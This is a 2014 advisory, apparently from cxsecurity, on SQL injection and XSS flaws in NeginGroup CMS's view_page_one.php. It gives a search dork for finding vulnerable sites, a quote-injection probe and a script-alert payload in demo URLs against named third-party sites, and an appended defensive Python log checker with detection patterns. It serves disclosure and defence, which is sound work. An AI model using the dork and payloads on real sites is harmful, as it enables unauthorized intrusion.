NeginGroup CMS Sql Injection / XSS

2014-05-29 / 2014-05-30
Credit: Hekt0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79, CWE-89

[+] Title: Sql Injection / Xss on NeginGroup CMS
[+] Date: 2014/5/29
[+] Author: Hekt0r
[+] Vendor Homepage: www.NeginGroup.com
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable File: /view_page_one.php
[+] Dork : intext:www.NeginGroup.com inurl:/view_page_one.php?v=

### Exploitation:

[+] Exploit Sql Injection:
http://site/view_page_one.php?v=[SQL-Injection]

[+] Exploit Xss:
http://site/view_page_one.php?v=[Xss]

### Demo:

[+] Sqli:
http://www.irXantwins.com/view_page_one.php?v=1'
http://jovaincXo.com/view_page_one.php?v=3'

[+] Xss:
http://www.irantXwins.com/view_page_one.php?v=<script>alert(/Xss/)</script>
http://jovaincXo.com/view_page_one.php?v=<script>alert(/Xss/)</script>

[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Saeed.Jok3r, M4hdi, ALIREZA_PROMIS, LiNuX-LoVeR And All members of Iran Security Group
[+] iransec.net
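
Added example (not part of the original advisory): a log check a defender can run to find requests to the vulnerable file whose `v` parameter is not a plain number. It assumes Combined Log Format access logs and that legitimate `v` values are numeric ids, as the `v=1` and `v=3` demo URLs suggest; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VULN_PATH = "/view_page_one.php"  # vulnerable file named in the advisory

def classify_v(value):
    """Label one decoded `v` value. Assumption: valid values are numeric ids."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if re.search(r"[<>]|script|on\w+\s*=", value, re.I):
        return "xss-probe"
    if re.search(r"['\"]|--|/\*|\b(union|select|sleep)\b", value, re.I):
        return "sqli-probe"
    return "non-numeric"

def suspicious_requests(log_lines):
    """Return (client_ip, label, decoded_value) for each suspect request."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith(VULN_PATH):
            continue
        # parse_qs percent-decodes, so v=1%27 is inspected as 1'
        values = parse_qs(target.query, keep_blank_values=True).get("v", [])
        for value in values:
            label = classify_v(value)
            if label:
                findings.append((line.split()[0], label, value))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2014:10:00:01 +0000] "GET /view_page_one.php?v=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/May/2014:10:00:05 +0000] "GET /view_page_one.php?v=1%27 HTTP/1.1" 200 812',
    '203.0.113.4 - - [29/May/2014:10:00:09 +0000] "GET /view_page_one.php?v=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4990',
    '192.0.2.10 - - [29/May/2014:10:00:12 +0000] "GET /index.php?v=1%27 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, label, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{value!r}")
```

The same numeric-only rule is the server-side fix: reject or cast `v` to an integer before it reaches the query, and HTML-encode it wherever it is echoed back.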


Copyright 2024, cxsecurity.com